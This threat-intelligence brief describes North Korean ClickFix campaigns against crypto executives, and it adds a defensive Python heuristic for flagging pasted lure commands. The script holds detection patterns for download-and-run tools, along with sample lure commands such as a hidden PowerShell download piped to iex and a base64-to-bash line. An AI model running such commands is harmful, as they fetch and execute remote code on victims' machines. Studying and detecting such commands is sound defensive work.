ClickFix/SmartApeSG/Lazarus/APT37 evolving
Key Questions
Which threat actors are behind the ClickFix campaigns targeting crypto executives?
North Korean groups including Lazarus, BlueNoroff, and APT37 are deploying ClickFix attacks with Remcos, MacSync, and LNK-ZIP Python backdoors. They use AI-themed lures on Zoom, Teams, and Meet along with fake job offers on LinkedIn and GitHub to deliver malware and conduct supply-chain and clipboard hijacks.
What new delivery method involves a fake Claude Code installer?
A fake Claude Code installer is being hosted on Google Sites and uses steganography with in-memory execution to deliver credential-stealing malware. This expands the lure diversity in ongoing campaigns adjacent to crypto wallet theft operations.
How significant is the rise in AI-themed social engineering attacks?
There has been a 1265% surge in AI-related lures, often combined with deepfakes, contributing to over $3B in thefts. Defenses such as PhishSigma++ with layered protections have demonstrated greater than 99% effectiveness against these evolving threats.
Summary: North Korean groups Lazarus, BlueNoroff and APT37 deploy ClickFix lures that deliver Remcos, MacSync and an LNK-ZIP Python backdoor, using AI-themed Zoom/Teams/Meet invitations and fake job offers (LinkedIn/GitHub) to trick crypto executives. The campaigns add trojanized apps, supply-chain compromise and clipboard hijacking for credential and wallet exfiltration. AI-themed lures are up 1265%, often paired with deepfakes, with $3B+ in thefts. PhishSigma++ and layered defenses are reported as >99% effective. New: a fake Claude Code installer hosted on Google Sites (steganography, in-memory execution) expands lure diversity and sits adjacent to crypto wallet theft operations.
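ClickFix lures, as described above, end with the victim pasting a command into the Run dialog or a terminal. The following added example (not from this page or any of the named campaigns) is a defender-side heuristic that scores such pasted commands by counting independent indicators; the regexes are generic assumptions, and the sample commands are constructed and point at the reserved `example.invalid` host.

```python
import re

# Generic indicators of a ClickFix-style pasted command (assumed heuristics,
# not signatures from any specific campaign). Each one is weak alone;
# is_suspicious() requires several to co-occur to keep false positives down.
CLICKFIX_INDICATORS = {
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    # Windows and macOS download-and-run primitives followed by a URL
    "remote_loader": re.compile(
        r"(?:mshta|certutil|bitsadmin|iwr|invoke-webrequest|downloadstring"
        r"|curl|wget)\b.*https?://", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(?:bash|sh|zsh|osascript)\b", re.I),
    "base64_decode": re.compile(
        r"base64\s+(?:-d|--decode)|frombase64string", re.I),
}


def clickfix_indicators(command: str) -> list:
    """Return the sorted names of all indicators matched by a pasted command."""
    return sorted(name for name, rx in CLICKFIX_INDICATORS.items()
                  if rx.search(command))


def is_suspicious(command: str, threshold: int = 2) -> bool:
    """Flag a command when at least `threshold` independent indicators match."""
    return len(clickfix_indicators(command)) >= threshold


# Constructed sample inputs: two lure-style commands and one benign one.
SAMPLES = [
    'powershell -w hidden -ep bypass -c "iwr http://example.invalid/x.txt | iex"',
    "echo aGVsbG8= | base64 -d | bash",
    "ipconfig /all",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(is_suspicious(cmd), clickfix_indicators(cmd), cmd)
```

Feed it the Run-dialog history (RunMRU) or shell history collected by your EDR to triage ClickFix incidents; the threshold and patterns are starting points to tune against your own baseline.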